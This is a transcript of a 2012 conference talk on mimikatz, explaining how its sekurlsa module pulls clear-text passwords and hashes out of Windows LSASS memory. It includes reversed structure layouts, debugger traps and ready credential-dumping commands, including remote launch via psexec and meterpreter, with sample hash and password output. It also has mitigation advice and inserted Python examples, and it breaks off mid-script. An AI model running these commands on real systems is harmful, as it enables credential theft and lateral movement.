mimikatz @ asfws


Upload: benjamin-delpy

Post on 19-Jun-2015


DESCRIPTION

mimikatz @ asfws - http://blog.gentilkiwi.com/mimikatz Focus on sekurlsa / pass-the-pass & keys export with CryptoAPI / CNG

TRANSCRIPT

Page 1: mimikatz @ asfws

mimikatz

Benjamin DELPY `gentilkiwi`

focus on sekurlsa / pass-the-pass and crypto patches

Page 2: mimikatz @ asfws

Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - [email protected] ; blog.gentilkiwi.com 2

Who? Why?

Benjamin DELPY `gentilkiwi`
– French
– 26y
– Kiwi addict
– Lazy programmer

Started to code mimikatz to:
– explain security concepts;
– improve my knowledge;
– prove to Microsoft that sometimes they must change old habits.

Why all in French?
– because I'm
– It limits script kiddies usage
– Hack with class

07/11/2012

Page 3: mimikatz @ asfws

mimikatz – working

On XP, 2003, Vista, 2008, Seven, 2008r2, 8, Server 8
– x86 & x64
– 2000 support dropped with mimikatz 1.0

Everywhere; it's statically compiled

Two modes
– direct action (local commands)
– process or driver communication

[Diagram – direct action: mimikatz.exe acts on the KeyIso service ("CNG Key Isolation", hosted in LSASS.EXE) with crypto::patchcng, and on the EventLog service ("Windows Event Log", hosted in SVCHOST.EXE) with divers::eventdrop]

[Diagram – process communication: mimikatz.exe injects sekurlsa.dll into the SamSS service ("Security Accounts Manager", LSASS.EXE) via VirtualAllocEx, WriteProcessMemory, CreateRemoteThread...; the injected DLL opens a pipe, writes a welcome message, waits for commands… and returns results]

Page 4: mimikatz @ asfws

mimikatz – architecture of sekurlsa & crypto

[Diagram – mimikatz.exe command modules: mod_mimikatz_sekurlsa, mod_mimikatz_nogpo, mod_mimikatz_divers, mod_mimikatz_winmine, mod_mimikatz_impersonate, mod_mimikatz_inject, mod_mimikatz_samdump, mod_mimikatz_standard, mod_mimikatz_crypto, mod_mimikatz_handle, mod_mimikatz_system, mod_mimikatz_service, mod_mimikatz_process, mod_mimikatz_thread, mod_mimikatz_terminalserver, mod_mimikatz_privilege]

[Diagram – shared library modules: mod_pipe, mod_inject, mod_memory, mod_parseur, mod_patch, mod_hive, mod_secacl, mod_privilege, mod_process, mod_service, mod_system, mod_thread, mod_ts, mod_text, mod_crypto, mod_cryptoapi, mod_cryptong]

[Diagram – mod_mimikatz_sekurlsa sub-modules: msv_1_0, tspkg, wdigest, livessp, kerberos; injectable DLLs: kappfree.dll, kelloworld.dll, klock.dll; driver: mimikatz.sys; sekurlsa.dll with sam, secrets, msv_1_0, wdigest, livessp, kerberos, tspkg]

Page 5: mimikatz @ asfws

mimikatz :: sekurlsa – what is it? (mod_mimikatz_sekurlsa)

A module replacement for my previous favorite library!

A local module that can read data from the SamSS service (the well known LSASS process)

What the sekurlsa module can dump:
– MSV1_0 hashes
– TsPkg passwords
– Wdigest passwords
– LiveSSP passwords
– Kerberos passwords (!)
– …?

Page 6: mimikatz @ asfws

mimikatz :: sekurlsa – how LSA works (PLAYSKOOL level)

[Diagram: WinLogon passes user:domain:password to LsaSS; LsaSS loads the authentication packages msv1_0, tspkg, wdigest, livessp and kerberos; authentication is done by msv1_0 (against the SAM) or by kerberos, using challenge/response]

Page 7: mimikatz @ asfws

mimikatz :: sekurlsa – how LSA works (PLAYSKOOL level)

Authentication packages:
– take the user's credentials from the logon
– make their own stuff
– keep enough data in memory to compute responses to challenges (Single Sign On)

If we can get that data and inject it in another LSASS session, we skip the authentication part

This is the principle of « Pass-the-hash »
– In fact, of « Pass-the-x »

Page 8: mimikatz @ asfws

mimikatz :: sekurlsa – history of « pass-the-* » 1/2

Pass-the-hash
– 1997 - Unix modified SAMBA client for hashes usage; Paul Ashton (EIGEN)
– 2000 - Private version of a Windows « LSA Logon Session Editor »; Hernan Ochoa (CoreSecurity)
– 2007 - TechEd @ Microsoft; Marc Murray (TrueSec) presents msvctl, and provides some downloads of it
– 2007 - « Pass the hash toolkit » published; Hernan Ochoa (CoreSecurity)
– 2007 - mimikatz 0.1 includes pass the hash and is publicly available for x86 & x64 versions of Windows (yeah, by myself but in French; so not famous ;))

2007 was the year of pass the hash!

Pass-the-ticket
– 04/2011 - wce (pass the hash toolkit evolution) provides Kerberos ticket support; Hernan Ochoa (Ampliasecurity)

Page 9: mimikatz @ asfws

mimikatz :: sekurlsa – history of « pass-the-* » 2/2

Pass-the-pass
– 05/2011 – mimikatz 1.0 dumps the first clear text passwords from the TsPkg provider (but limited to NT 6 and some XP SP3)
• http://blog.gentilkiwi.com/securite/pass-the-pass
– 05/2011 – return of mimikatz; it dumps clear text passwords from the WDigest provider (unlimited this time ;))
• http://blog.gentilkiwi.com/securite/re-pass-the-pass
– 05/2011 – Some organizations opened cases with Microsoft about it…
…Lots of time…
– begin of 2012 - Lots of blogs (and Kevin Mitnick ;)) say a few words about mimikatz
– 03/2012 - Hernan Ochoa (Ampliasecurity) publishes at seclists that wce supports WDigest password extraction…
• http://seclists.org/pen-test/2012/Mar/7
– 03/2012 – mimikatz strikes again with the LiveSSP provider and extracts Live login passwords from Windows 8 memory
• http://blog.gentilkiwi.com/securite/rere-pass-the-pass
– 03/2012 – yeah, once again…, more curious but Kerberos keeps passwords in memory
• http://blog.gentilkiwi.com/securite/rerere-pass-the-pass
– 08/2012 – sekurlsa module without injection at all! (ultra safe)
• http://blog.gentilkiwi.com/securite/mimikatz/sekurlsa-fait-son-apparition

Page 10: mimikatz @ asfws

mimikatz :: sekurlsa :: tspkg

because sometimes the hash is not enough…

Page 11: mimikatz @ asfws

mimikatz :: sekurlsa :: tspkg – what is it?

Microsoft introduced SSO capability for Terminal Server with NT 6 to improve the RemoteApp and Remote Desktop user experience
– http://technet.microsoft.com/library/cc772108.aspx

Relies on CredSSP with Credentials Delegation (!= Account delegation)
– Specs: http://download.microsoft.com/download/9/5/e/95ef66af-9026-4bb0-a41d-a4f81802d92c/%5Bms-cssp%5D.pdf

First impression: it seems cool
– The user does not have to type their password
– The password is not in the RDP file
– The password is not in the user's secrets

Page 12: mimikatz @ asfws

mimikatz :: sekurlsa :: tspkg – questions?

The KB says that for it to work, we must enable « Default credentials » delegation
– "Default credentials: The credentials obtained when the user first logs on to Windows" - https://msdn.microsoft.com/library/bb204773.aspx
• What? Our User/Domain/{Password | Hash | Ticket}? It seems…
– In all cases, the system seems to be vulnerable to pass-the-*…

In what form? Our specs: [MS-CSSP]
– 2.2.1.2.1 TSPasswordCreds
• The TSPasswordCreds structure contains the user's password credentials that are delegated to the server. (or PIN)

    TSPasswordCreds ::= SEQUENCE {
        domainName [0] OCTET STRING,
        userName   [1] OCTET STRING,
        password   [2] OCTET STRING
    }

– Challenge / response for authentication?
• Server: YES (TLS / Kerberos)
• Client: NO; the *password* is sent to the server…

So the password resides somewhere in memory?
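As an added example (not from the slides and not mimikatz code), the Python below encodes and decodes the TSPasswordCreds structure quoted above, then checks the slide's point: there is no client-side challenge/response, the password itself is what gets delegated, so its bytes sit in the structure verbatim (inside the TLS tunnel). Two assumptions the slide does not state: the ASN.1 module uses explicit tagging (the default, so each [n] wraps an OCTET STRING), and the three strings are UTF-16LE as [MS-CSSP] specifies. The sample domain, user and password are constructed.

```python
"""Encode/decode [MS-CSSP] TSPasswordCreds and show the delegated password
sits in the structure verbatim.  Added example, not from the slides or
from mimikatz.  Assumptions not on the slide: explicit ASN.1 tagging (the
default, so [n] wraps an OCTET STRING) and UTF-16LE strings per [MS-CSSP]."""

FIELD_NAMES = {0: "domainName", 1: "userName", 2: "password"}


def _der_len(n: int) -> bytes:
    # DER definite length: short form below 128, long form otherwise.
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def _tlv(tag: int, value: bytes) -> bytes:
    return bytes([tag]) + _der_len(len(value)) + value


def _read_tlv(buf: bytes, pos: int):
    """Return (tag, value, next_pos) for the TLV that starts at pos."""
    tag, first = buf[pos], buf[pos + 1]
    if first < 0x80:
        length, pos = first, pos + 2
    else:
        nbytes = first & 0x7F
        length = int.from_bytes(buf[pos + 2:pos + 2 + nbytes], "big")
        pos += 2 + nbytes
    return tag, buf[pos:pos + length], pos + length


def encode_ts_password_creds(domain: str, user: str, password: str) -> bytes:
    """TSPasswordCreds ::= SEQUENCE { domainName [0], userName [1], password [2] }"""
    fields = []
    for idx, text in enumerate((domain, user, password)):
        octet_string = _tlv(0x04, text.encode("utf-16-le"))  # OCTET STRING
        fields.append(_tlv(0xA0 | idx, octet_string))         # [idx] EXPLICIT, constructed
    return _tlv(0x30, b"".join(fields))                       # SEQUENCE


def decode_ts_password_creds(blob: bytes) -> dict:
    tag, body, end = _read_tlv(blob, 0)
    if tag != 0x30 or end != len(blob):
        raise ValueError("expected exactly one DER SEQUENCE")
    creds, pos = {}, 0
    while pos < len(body):
        ctx_tag, inner, pos = _read_tlv(body, pos)
        if ctx_tag & 0xE0 != 0xA0:          # context-specific, constructed
            raise ValueError(f"unexpected tag {ctx_tag:#04x}")
        str_tag, octets, _ = _read_tlv(inner, 0)
        if str_tag != 0x04:
            raise ValueError("expected OCTET STRING inside the context tag")
        creds[FIELD_NAMES[ctx_tag & 0x1F]] = octets.decode("utf-16-le")
    return creds


def password_is_literal_in_blob(blob: bytes, password: str) -> bool:
    """The slide's point: no client-side challenge/response, the password
    itself is delegated, so its UTF-16LE bytes appear in the blob as-is."""
    return password.encode("utf-16-le") in blob


if __name__ == "__main__":
    # Constructed sample values, not real credentials.
    blob = encode_ts_password_creds("CONTOSO", "alice", "Passw0rd!")
    print(blob.hex())
    print(decode_ts_password_creds(blob))
    print("password visible in blob:", password_is_literal_in_blob(blob, "Passw0rd!"))
```

Because the password is carried as data rather than proven with a challenge/response, the receiving side (and anything that can read the structure before it is protected or after it is unprotected) holds the password itself; that is the property the following slides exploit in memory.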

Page 13: mimikatz @ asfws

mimikatz :: sekurlsa :: tspkg – symbols & theory

Let's explore some symbols!
– sounds cool… (thanks Microsoft)

Let's imagine a scenario
– Enumerate all sessions to obtain:
• Username
• Domain
• LUID
– Call tspkg!TSCredTableLocateDefaultCreds (relies on RtlLookupElementGenericTableAvl) with the LUID to obtain:
• TS_CREDENTIAL
– Call tspkg!TSObtainClearCreds (relies on LsaUnprotectMemory) with the TS_CREDENTIAL data (TS_PRIMARY_CREDENTIAL) for:
• TS_PRIMARY_CREDENTIAL with clear text credentials…

kd> x tspkg!*clear*
75016d1c tspkg!TSObtainClearCreds = <no type information>
kd> x tspkg!*password*
75011b68 tspkg!TSDuplicatePassword = <no type information>
75011cd4 tspkg!TSHidePassword = <no type information>
750195ee tspkg!TSRevealPassword = <no type information>
75012fbd tspkg!TSUpdateCredentialsPassword = <no type information>
kd> x tspkg!*locate*
7501158b tspkg!TSCredTableLocateDefaultCreds = <no type information>

Page 14: mimikatz @ asfws

mimikatz :: sekurlsa :: tspkg – workflow

[Diagram: LsaEnumerateLogonSessions → for each LUID → lookup in tspkg!TSGlobalCredTable with RtlLookupElementGenericTableAvl → KIWI_TS_CREDENTIAL → pTsPrimary → KIWI_TS_PRIMARY_CREDENTIAL → LsaUnprotectMemory → password in clear!]

typedef struct _KIWI_TS_PRIMARY_CREDENTIAL {
    PVOID unk0;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Password;
} KIWI_TS_PRIMARY_CREDENTIAL, *PKIWI_TS_PRIMARY_CREDENTIAL;

typedef struct _KIWI_TS_CREDENTIAL {
#ifdef _M_X64
    BYTE unk0[108];
#elif defined _M_IX86
    BYTE unk0[64];
#endif
    LUID LocallyUniqueIdentifier;
    PVOID unk1;
    PVOID unk2;
    PKIWI_TS_PRIMARY_CREDENTIAL pTsPrimary;
} KIWI_TS_CREDENTIAL, *PKIWI_TS_CREDENTIAL;

Page 15: mimikatz @ asfws

mimikatz :: sekurlsa :: tspkg – demo time!

sekurlsa::tspkg

Page 16: mimikatz @ asfws

mimikatz :: sekurlsa :: wdigest

because a clear text password over http/https is not cool

Page 17: mimikatz @ asfws

mimikatz :: sekurlsa :: wdigest – what is it?

"Digest access authentication is one of the agreed-upon methods a web server can use to negotiate credentials with a user's web browser. It applies a hash function to a password before sending it over the network […]"
Wikipedia: http://en.wikipedia.org/wiki/Digest_access_authentication

"Common Digest Authentication Scenarios:
– Authenticated client access to a Web site
– Authenticated client access using SASL
– Authenticated client access with integrity protection to a directory service using LDAP"
Microsoft: http://technet.microsoft.com/library/cc778868.aspx

Again, it seems cool
– No password over the network, just hashes
– No reversible password in Active Directory; hashes for each realm
• Only with Advanced Digest authentication

Page 18: mimikatz @ asfws

mimikatz :: sekurlsa :: wdigest – what is it?

We speak about hashes, but what hashes?

    H = MD5(HA1:nonce:[…]:HA2)
    • HA1 = MD5(username:realm:password)
    • HA2 = MD5(method:digestURI:[…])

Even after login, HA1 may change… the realm comes from the server side and cannot be determined before Windows logon

The WDigest provider must have the elements to compute responses for different servers:
– Username
– Realm (from server)
– Password
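The RFC 2617 computation above, worked through as an added example (not the slides' own code and not part of mimikatz): HA1 mixes in the realm, each server picks its realm at challenge time, so a client offering Digest SSO to arbitrary servers cannot reduce the password to one stored hash at logon; the server, by contrast, only needs HA1 for its own realm. The test vector is the one published in RFC 2617 section 3.5 (user Mufasa, realm testrealm@host.com); the realm list passed to the SSO helper is constructed.

```python
"""RFC 2617 Digest computation, to show why an SSO client must keep the
password while a server keeps only HA1.  Added example, not from the
slides or from mimikatz."""
from hashlib import md5


def _h(text: str) -> str:
    return md5(text.encode("utf-8")).hexdigest()


def ha1(username: str, realm: str, password: str) -> str:
    # HA1 = MD5(username:realm:password): the realm is the server's choice.
    return _h(f"{username}:{realm}:{password}")


def ha2(method: str, digest_uri: str) -> str:
    # HA2 = MD5(method:digestURI) for qop=auth (or no qop).
    return _h(f"{method}:{digest_uri}")


def digest_response(username, realm, password, nonce, method, uri,
                    qop=None, nc=None, cnonce=None) -> str:
    """Client side: response = MD5(HA1:nonce:[nc:cnonce:qop:]HA2)."""
    a1, a2 = ha1(username, realm, password), ha2(method, uri)
    if qop:
        return _h(f"{a1}:{nonce}:{nc}:{cnonce}:{qop}:{a2}")
    return _h(f"{a1}:{nonce}:{a2}")


def server_verify(stored_ha1, nonce, method, uri, response,
                  qop=None, nc=None, cnonce=None) -> bool:
    """Server side: only HA1 for its own realm is stored (the slide's
    "hashes for each realm"); the password itself is never needed here."""
    a2 = ha2(method, uri)
    expected = (_h(f"{stored_ha1}:{nonce}:{nc}:{cnonce}:{qop}:{a2}") if qop
                else _h(f"{stored_ha1}:{nonce}:{a2}"))
    return expected == response


def ha1_needed_for_sso(username: str, password: str, realms) -> dict:
    """What a client would have to hold if it cached HA1 instead of the
    password: one value per realm, and realms are only learned from each
    server's challenge, after logon."""
    return {realm: ha1(username, realm, password) for realm in realms}


if __name__ == "__main__":
    # RFC 2617 section 3.5 example values.
    resp = digest_response("Mufasa", "testrealm@host.com", "Circle Of Life",
                           "dcd98b7102dd2f0e8b11d0f600bfb0c093", "GET", "/dir/index.html",
                           qop="auth", nc="00000001", cnonce="0a4f113b")
    print(resp)
    # Constructed realm names: every one yields a different HA1.
    print(ha1_needed_for_sso("Mufasa", "Circle Of Life", ["intranet", "mail", "wiki"]))
```

This is the asymmetry the slide relies on: the protocol lets the server get away with a per-realm hash, but an SSO client that must answer for realms it has not seen yet has nothing cheaper than the password to keep.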

Page 19: mimikatz @ asfws

mimikatz :: sekurlsa :: wdigest – theory

This time, we know:
– that WDigest keeps the password in memory « by protocol » for the HA1 digest
– that LSASS loves to unprotect passwords with LsaUnprotectMemory (so it protects them with LsaProtectMemory)

LsaUnprotectMemory
– At offset 0xb4 of LSA_SECPKG_FUNCTION_TABLE
– Let's search for it in WDigest:

    .text:7409D151 _DigestCalcHA1@8        call dword ptr [eax+0B4h]

– Hypothesis seems verified

LsaProtectMemory
– At offset 0xb0 of LSA_SECPKG_FUNCTION_TABLE
– Let's search for it in WDigest:

    .text:74096C69 _SpAcceptCredentials@16  call dword ptr [eax+0B0h]

– SpAcceptCredentials takes the clear password in its args
• Protects it with LsaProtectMemory
• Updates or inserts data in a doubly linked list: wdigest!l_LogSessList

Page 20: mimikatz @ asfws

mimikatz :: sekurlsa :: wdigest – workflow

[Diagram: LsaEnumerateLogonSessions → for each LUID → search the linked list wdigest!l_LogSessList for the LUID → KIWI_WDIGEST_LIST_ENTRY → LsaUnprotectMemory → password in clear!]

typedef struct _KIWI_WDIGEST_LIST_ENTRY {
    struct _KIWI_WDIGEST_LIST_ENTRY *Flink;
    struct _KIWI_WDIGEST_LIST_ENTRY *Blink;
    DWORD UsageCount;
    struct _KIWI_WDIGEST_LIST_ENTRY *This;
    LUID LocallyUniqueIdentifier;
    […]
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
    […]
} KIWI_WDIGEST_LIST_ENTRY, *PKIWI_WDIGEST_LIST_ENTRY;

Page 21: mimikatz @ asfws

mimikatz :: sekurlsa :: wdigest – demo time!

sekurlsa::wdigest

Page 22: mimikatz @ asfws

mimikatz :: sekurlsa :: livessp

because Microsoft was too good in closed networks

Page 23: mimikatz @ asfws

mimikatz :: sekurlsa :: livessp – how

Actually I've only used a logical (empirical) approach to search for passwords…:
– Protocol reading
– Symbols searching

~ Boring ~… let's be more brutal this time: make a WinDbg trap!

0: kd> !process 0 0 lsass.exe
PROCESS 83569040  SessionId: 0  Cid: 0224    Peb: 7f43f000  ParentCid: 01b4
    DirBase: 5df58100  ObjectTable: 80ce4740  HandleCount: <Data Not Accessible>
    Image: lsass.exe

0: kd> .process /i 83569040
You need to continue execution (press 'g' <enter>) for the context
to be switched. When the debugger breaks in again, you will be in
the new process context.
0: kd> g
Break instruction exception - code 80000003 (first chance)
nt!RtlpBreakWithStatusInstruction:
814b39d0 cc              int     3
0: kd> .reload /user
Loading User Symbols
............................................................
0: kd> bp /p @$proc lsasrv!LsaProtectMemory "kc 5 ; g"
0: kd> g

Page 24: mimikatz @ asfws

mimikatz :: sekurlsa :: livessp – how

Let's login with a Live account on Windows 8!

[Trap output – call stacks at lsasrv!LsaProtectMemory (kc 5):]

    lsasrv!LsaProtectMemory
    livessp!LiveMakeSupplementalCred
    livessp!LiveMakeSecPkgCredentials
    livessp!LsaApLogonUserEx2
    livessp!SpiLogonUserEx2
    ← Our LiveSSP provider

    lsasrv!LsaProtectMemory
    msv1_0!NlpAddPrimaryCredential
    msv1_0!SspAcceptCredentials
    msv1_0!SpAcceptCredentials
    ← Yeah, Pass the Hash capability with a Live account too…

    lsasrv!LsaProtectMemory
    tspkg!TSHidePassword
    tspkg!SpAcceptCredentials
    ← A Live user can logon through RDP via SSO

After credentials protection, LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest)

    1: kd> uf /c livessp!LsaApLogonUserEx2
    livessp!LsaApLogonUserEx2 (74781536)
    [...]
      livessp!LsaApLogonUserEx2+0x560 (74781a96):
        call to livessp!LiveCreateLogonSession (74784867)

Page 25: mimikatz @ asfws

mimikatz :: sekurlsa :: livessp – workflow

[Diagram: LsaEnumerateLogonSessions → for each LUID → search the linked list livessp!LiveGlobalLogonSessionList for the LUID → KIWI_LIVESSP_LIST_ENTRY → suppCreds → KIWI_LIVESSP_PRIMARY_CREDENTIAL → LsaUnprotectMemory → password in clear!]

typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL {
    DWORD isSupp;
    DWORD unk0;
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
} KIWI_LIVESSP_PRIMARY_CREDENTIAL, *PKIWI_LIVESSP_PRIMARY_CREDENTIAL;

typedef struct _KIWI_LIVESSP_LIST_ENTRY {
    struct _KIWI_LIVESSP_LIST_ENTRY *Flink;
    struct _KIWI_LIVESSP_LIST_ENTRY *Blink;
    PVOID unk0;
    PVOID unk1;
    PVOID unk2;
    PVOID unk3;
    DWORD unk4;
    DWORD unk5;
    PVOID unk6;
    LUID LocallyUniqueIdentifier;
    LSA_UNICODE_STRING UserName;
    PVOID unk7;
    PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds;
} KIWI_LIVESSP_LIST_ENTRY, *PKIWI_LIVESSP_LIST_ENTRY;

Page 26: mimikatz @ asfws

mimikatz :: sekurlsa

Even if we already have tools for normal accounts, are you not curious to test one with this trap?*

* Me, yes

Page 27: mimikatz @ asfws

mimikatz :: sekurlsa :: kerberos

Let's login with a normal account

[Trap output – call stacks at lsasrv!LsaProtectMemory:]

    lsasrv!LsaProtectMemory
    kerberos!KerbHideKey
    kerberos!KerbCreatePrimaryCredentials
    kerberos!KerbCreateLogonSession
    kerberos!SpAcceptCredentials
    ← Kerberos, ticket part? Maybe ;)

    lsasrv!LsaProtectMemory
    kerberos!KerbHidePassword
    kerberos!KerbCreateLogonSession
    kerberos!SpAcceptCredentials
    ← Kerberos part for password ??????

    lsasrv!LsaProtectMemory
    msv1_0!NlpAddPrimaryCredential
    msv1_0!SspAcceptCredentials
    msv1_0!SpAcceptCredentials

    lsasrv!LsaProtectMemory
    wdigest!SpAcceptCredentials

    lsasrv!LsaProtectMemory
    tspkg!TSHidePassword
    tspkg!SpAcceptCredentials

After credentials protection, KerbCreateLogonSession calls:
– NT6; KerbInsertOrLocateLogonSession to insert data in KerbGlobalLogonSessionTable
– NT5; KerbInsertLogonSession to insert data in KerbLogonSessionList

Page 28: mimikatz @ asfws

mimikatz :: sekurlsa :: kerberos (nt6) – workflow

[Diagram: LsaEnumerateLogonSessions → for each LUID → lookup in kerberos!KerbGlobalLogonSessionTable with RtlLookupElementGenericTableAvl → KIWI_KERBEROS_PRIMARY_CREDENTIAL → LsaUnprotectMemory → password in clear!]

typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL {
    DWORD unk0;
    PVOID unk1;
    PVOID unk2;
    PVOID unk3;
#ifdef _M_X64
    BYTE unk4[32];
#elif defined _M_IX86
    BYTE unk4[20];
#endif
    LUID LocallyUniqueIdentifier;
#ifdef _M_X64
    BYTE unk5[44];
#elif defined _M_IX86
    BYTE unk5[36];
#endif
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
} KIWI_KERBEROS_PRIMARY_CREDENTIAL, *PKIWI_KERBEROS_PRIMARY_CREDENTIAL;

Page 29: mimikatz @ asfws

mimikatz :: sekurlsa :: kerberos (nt5) – workflow

[Diagram: LsaEnumerateLogonSessions → for each LUID → search the linked list kerberos!KerbLogonSessionList for the LUID → KIWI_KERBEROS_LOGON_SESSION → LsaUnprotectMemory → password in clear!]

typedef struct _KIWI_KERBEROS_LOGON_SESSION {
    struct _KIWI_KERBEROS_LOGON_SESSION *Flink;
    struct _KIWI_KERBEROS_LOGON_SESSION *Blink;
    DWORD UsageCount;
    PVOID unk0;
    PVOID unk1;
    PVOID unk2;
    DWORD unk3;
    DWORD unk4;
    PVOID unk5;
    PVOID unk6;
    PVOID unk7;
    LUID LocallyUniqueIdentifier;
#ifdef _M_IX86
    DWORD unk8;
#endif
    DWORD unk9;
    DWORD unk10;
    PVOID unk11;
    DWORD unk12;
    DWORD unk13;
    PVOID unk14;
    PVOID unk15;
    PVOID unk16;
    […]
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
} KIWI_KERBEROS_LOGON_SESSION, *PKIWI_KERBEROS_LOGON_SESSION;

Page 30: mimikatz @ asfws

mimikatz :: sekurlsa – demo time!

Final sekurlsa demo: sekurlsa::logonPasswords full

Page 31: mimikatz @ asfws

mimikatz :: sekurlsa :: kerberos – "hu?"

OK, it works… *But why?*
* Not at all logons on NT5 (can need an unlock)

From my understanding of Microsoft's explanations
– no need of passwords for the Kerberos protocol…
– all is based on the hash (not very sexy either)

Microsoft's implementation of Kerberos is full of logic…
– For password auth:
• password hash for the shared secret, but keeping the password in memory
– For full smartcard auth:
• No password on the client
• No hash on the client?
– NTLM hash on the client…
– The KDC sent it back as a gift

Page 32: mimikatz @ asfws

mimikatz :: sekurlsa

All passwords in memory are encrypted, but in a reversible way so they can be used

We used LsaUnprotectMemory, in the LSASS context, to decrypt them
– This function relies on LsaEncryptMemory from lsasrv.dll

For that, we previously injected a DLL (sekurlsa.dll) into the LSASS process to benefit from its keys when we called it

Can it be fun to decrypt outside the process?
– Yes, it is… no more injection, just reading the memory of the LSASS process…

mimikatz can use lsasrv.dll too and "imports" the keys initialized by LSASS
– When we call LsaEncryptMemory in mimikatz, with all keys imported from LSASS, we get the same behaviour as when we are in LSASS!

Page 33: mimikatz @ asfws

mimikatz :: sekurlsa – LsaEncryptMemory NT5

Depending on the size of the secret, LsaEncryptMemory uses:
– RC4
– DESx

[Diagram: lsasrv in lsass holds g_cbRandomKey (DWORD; 256), g_pRandomKey (pointer to BYTE[g_cbRandomKey]), g_pDESXKey (pointer to BYTE[144]) and g_Feedback (BYTE[8]); mimikatz copies these from the LSASS process into its own lsasrv]

Page 34: mimikatz @ asfws

mimikatz :: sekurlsa – LsaEncryptMemory NT6

Depending on the size of the secret, LsaEncryptMemory uses:
– 3DES
– AES

[Diagram: lsasrv in lsass holds InitializationVector (BYTE[16]), h3DesKey and hAesKey (KIWI_BCRYPT_KEY handles); mimikatz copies them from the LSASS process into its own lsasrv]

typedef struct _KIWI_BCRYPT_KEY_DATA {
    DWORD size;
    DWORD tag;
    DWORD type;
    DWORD unk0;
    DWORD unk1;
    DWORD unk2;
    DWORD unk3;
    PVOID unk4;
    BYTE data; /* etc... */
} KIWI_BCRYPT_KEY_DATA, *PKIWI_BCRYPT_KEY_DATA;

typedef struct _KIWI_BCRYPT_KEY {
    DWORD size;
    DWORD type;
    PVOID unk0;
    PKIWI_BCRYPT_KEY_DATA cle;
    PVOID unk1;
} KIWI_BCRYPT_KEY, *PKIWI_BCRYPT_KEY;

Page 35: mimikatz @ asfws

mimikatz :: sekurlsa – memo

Security Packages

Package          Symbols                                Type
tspkg            tspkg!TSGlobalCredTable                RTL_AVL_TABLE
wdigest          wdigest!l_LogSessList                  LIST_ENTRY
livessp          livessp!LiveGlobalLogonSessionList     LIST_ENTRY
kerberos (nt5)   kerberos!KerbLogonSessionList          LIST_ENTRY
kerberos (nt6)   kerberos!KerbGlobalLogonSessionTable   RTL_AVL_TABLE
msv1_0           lsasrv!LogonSessionList                LIST_ENTRY
                 lsasrv!LogonSessionListCount           ULONG

Protection Keys

Key     NT 5 Symbols
RC4     lsasrv!g_cbRandomKey, lsasrv!g_pRandomKey
DESx    lsasrv!g_pDESXKey, lsasrv!g_Feedback

Key     NT 6 Symbols
        lsasrv!InitializationVector
3DES    lsasrv!h3DesKey
AES     lsasrv!hAesKey

Page 36: mimikatz @ asfws

mimikatz :: sekurlsa – memo

Some commands:

    mimikatz privilege::debug "sekurlsa::logonPasswords full" exit

    psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe "sekurlsa::logonPasswords full" exit

    meterpreter > execute -H -c -i -m -f /pentest/passwords/mimikatz/mimikatz_x86.exe

mimikatz 1.0 x64 (RC)   /* Traitement du Kiwi (Aug  2 2012 01:32:28) */
// http://blog.gentilkiwi.com/mimikatz

mimikatz # privilege::debug
Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK

mimikatz # sekurlsa::logonPasswords full

Authentification Id         : 0;234870
Package d'authentification  : NTLM
Utilisateur principal       : Gentil Kiwi
Domaine d'authentification  : vm-w8-rp-x
        msv1_0 :
         * Utilisateur  : Gentil Kiwi
         * Domaine      : vm-w8-rp-x
         * Hash LM      : d0e9aee149655a6075e4540af1f22d3b
         * Hash NTLM    : cc36cf7a8514893efccd332446158b1a
        kerberos :
         * Utilisateur  : Gentil Kiwi
         * Domaine      : vm-w8-rp-x
         * Mot de passe : waza1234/
        wdigest :
         * Utilisateur  : Gentil Kiwi
         * Domaine      : vm-w8-rp-x
         * Mot de passe : waza1234/
        tspkg :
         * Utilisateur  : Gentil Kiwi
         * Domaine      : vm-w8-rp-x
         * Mot de passe : waza1234/
        livessp :
         n.t. (LUID KO)

Page 37: mimikatz @ asfws

mimikatz :: sekurlsa – what can we do?

Basics
– No physical access to the computer (first step to pass the hash, then pass the pass)
– No admin rights / system rights / debug privileges (…)
– Disable local admin accounts
– Strong passwords (haha, it was a joke; so useless!!!)
– For privileged accounts, network logon instead of interactive (when possible)
– Audit; pass the hash keeps traces and can lock accounts
– No admin rights / system rights / debug privileges, even for VIPs
– Use a separate network (or forest) for privileged tasks

More in depth
– Force strong authentication (SmartCard & Token): $ / €
– Short validity for Kerberos tickets
– No delegation
– Disable NTLM (available with NT6)
– Nothing exotic:
• biometrics (it keeps the password somewhere and pushes it to Windows)
• single sign on
– Stop shared secrets for authentication: push Public / Private stuff (like keys ;))
– Leave opportunities to stop retro-compatibility
– Disable faulty providers?
• Is it supported by Microsoft?
• Even if you can disable LiveSSP, TsPkg and WDigest, will you disable Kerberos and msv1_0?
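Two of the "Basics" above turn directly into log checks: privileged accounts logging on over the network rather than interactively, and "audit; pass the hash keeps traces". The Python below is an added example, not code from the slides or from mimikatz. It runs over constructed events shaped like Windows Security event 4624 (LogonType, AuthenticationPackageName, TargetUserName, WorkstationName and Computer are real 4624 field names; every value is made up) and flags privileged accounts logging on interactively outside the hosts reserved for them, plus one account's NTLM network logons fanning out to several hosts inside a short window. The privileged/allowed lists and the thresholds are assumptions to tune per environment.

```python
"""Log checks for two of the slide's mitigations: privileged accounts should
log on over the network, not interactively, and pass-the-hash leaves traces
in the audit log.  Added example, not from the slides or mimikatz.  Field
names follow Windows Security event 4624; all values are constructed."""
from collections import defaultdict
from datetime import datetime, timedelta

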